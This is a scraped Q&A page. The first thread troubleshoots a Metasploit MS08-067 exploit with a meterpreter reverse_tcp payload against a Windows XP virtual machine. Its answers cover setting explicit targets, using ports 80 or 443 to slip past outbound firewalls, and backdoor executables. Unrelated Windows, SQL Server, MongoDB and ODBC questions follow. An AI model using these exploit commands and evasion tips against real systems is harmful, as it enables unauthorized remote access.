Metasploit error, stops at attempting to trigget vulnerability for ms08_067_netapi exploit - windows-xp

I am trying to hack my own webcam. My host PC is Linux Mint 17. The target is VM instance of Windows XP SP3.
Target IP - 192.168.1.6
My Host IP - 192.168.1.8
Problem is when i execute exploit, it says attempting to trigget the vulnerability and nothing happens.
Attached is the snapshot: Img link http://i.stack.imgur.com/EiPlr.png
Here are the commands i am using:
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.1.6
set LHOST 192.168.1.8
exploit

Looks like you want to open a metertpreter session. Assuming this, here is one suggestion.....
Try to issue "show targets" commands and set your O.S as target, explicitly.
eg:show targets
output might be something like....
Exploit targets:
Id Name
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
6 Windows 2003 SP1 English (NO NX)
7 Windows 2003 SP1 English (NX)
8 Windows 2003 SP2 English (NO NX)
9 Windows 2003 SP2 English (NX)
10 Windows XP SP2 Arabic (NX)
11 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
then issue command as....
set target 8
Then issue "exploit" command.
Then check if meterpreter console opens.

in most of the time windows targets are patched and you can not attack them with this exploit. but you can use some client side exploit like:
browse base exploit
backdoor executable
and ...

You might try different LPORT. Try using LPORT 80 which usually works. If it does not try LPORT 443. This may be because of Outbound firewall rules.

Related

Unable to login in SQL Server 2008 R2 64 bit from SQL Server 2008 R2 32 bit

I have a Windows Server 64 bit and I installed SQL Server 2008 R2 on it. I'm intending to use this machine for data replication. So, I have clients with Windows 7 32 bit on which I have installed SQL Server 2008 R2.
I want to create a publication on the Server (64bit) and subscribers (32 bit). I've enabled remote connections, disabled firewall, enabled named pipes and TCP, Telnet. I'm able to login to SQL Server (64 bit) from subscribers (32 bit) BUT I am unable to login to the server from subscribers.
Any help is highly appreciated.

Writing to Application Log on a remote Windows 7 machine

I need to write to an application log on a remote Window 7 computer. When my PC was running Windows 7, I could do so using a Write-Entry cmdlet, eventcreate, WriteEvent API, or LogEvent in VBS. Since upgrading my PC to Windows 10 (v1511), this no longer works failing with an error "The procedure number is out of range". I can write to an application log on a remote Window 10 machine, but the problem is with the remote (not firewalled) Window 7 PC. How can this problem be solved?

MongoDb loses performance in Windows Server 2012

I am running an application how reads and write a batch process using MongoDb in 2 identical machines. One running Windows 8.1 and the other running Windows Server 2012.
The MongoDb performance in the Windows Server 2012 machine is 5 times worse than Windows 8.
Both machines have 16Gb of RAM, but the mongod.exe process consumes 1.2Gb RAM in Windows 8 and 500Mb in Windows server in an identical local database.
I already use MongoDb 2.4, 2.6 and 2.6 legacy and de behavior is the same.
Has anyone seen this behavior before?

Opening edb-database with page size more than 8192 on Vista

I use
JetGetDatabaseFileInfo(db_name, &db_page_size, sizeof(db_page_size),JET_DbInfoPageSize);
JetSetSystemParameter(NULL, NULL, JET_paramDatabasePageSize, db_page_size, NULL);
to set the same page size of as a database have.
There is a database with page size == 32768. On windows 7 this code works perfectly. On Windows Vista JetSetSystemParameter returns JET_errInvalidParameter. Is there any way to open a database with page size of over 8192 on Windows Vista?
No. 32k pages were added in Windows 7.
Even if the database had 8k pages, there are other Windows 7 changes that would make the Vista esent.dll unable to open the Win7-based database file.
If it's just for your own use, you can copy the Win7 esent.dll to a Vista machine. But I don't believe that it's permissible to redistribute esent.dll with your program.
-martin

ODBC Connection to Access 2007 on WinXP

Is it possible to have an ODBC connection to a MS Access 2007 database on Windows XP without having any other database engine (i.e. Microsoft.ACE.OLEDB.12.0) installed?
I am using the following connection string which works on Windows 7 but not on Windows XP. (There is only *.mdb option in Data Sources (ODBC) control panel in Windows XP and no *.accdb option is there but both exist on Windows 7.):
connectionString = "Driver={Microsoft Access Driver (*.mdb, *.accdb)}; DBQ=|DataDirectory|Database1.accdb"
You can download drivers: http://www.microsoft.com/downloads/details.aspx?FamilyID=7554f536-8c28-4598-9b72-ef94e038c891&displaylang=en